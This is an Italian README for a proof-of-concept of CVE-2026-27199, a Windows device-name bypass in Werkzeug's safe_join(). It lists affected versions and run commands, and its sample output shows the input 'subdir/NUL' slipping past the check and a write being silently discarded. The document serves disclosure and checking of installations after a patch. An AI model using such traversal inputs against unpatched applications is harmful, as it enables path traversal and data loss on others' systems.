
Proof-of-concept exploit per CVE-2026-27199, un bypass del nome dispositivo Windows in safe_join() di Werkzeug, che dimostra il path traversal e lo scarto silenzioso dei dati.
safe_join() di WerkzeugStato: Divulgato pubblicamente. Corretto in werkzeug 3.1.6.
Gravità: Moderata
Segnalatore: @alimezar
Avviso: GHSA-29vq-49wr-vm6x
| Pacchetto | Interessato | Corretto |
|---|
| werkzeug | < 3.1.6 | 3.1.6 |
Richiede: Windows, Python 3.8+,
werkzeug < 3.1.6
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py
============================================================
CVE-2026-27199 — Werkzeug safe_join() PoC
============================================================
[*] Werkzeug version : 3.1.5
[*] os.name : nt
[+] safe_join(base, 'NUL') -> None (bloccato correttamente)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL (bypass!)
[*] Tentativo di scrittura sul percorso restituito ...
[!] open(NUL annidato) write: SUCCESS — dati scartati silenziosamente dal dispositivo
[!] VULNERABILE: CVE-2026-27199 confermato su questa installazione.
Aggiornare a werkzeug >= 3.1.6 per rimediare.
[+] safe_join(base, 'subdir/NUL') -> None (bloccato correttamente)
[+] NON VULNERABILE: il nome dispositivo annidato è stato bloccato.
Questo PoC è pubblicato per scopi educativi e difensivi a seguito della divulgazione responsabile e della disponibilità pubblica della patch.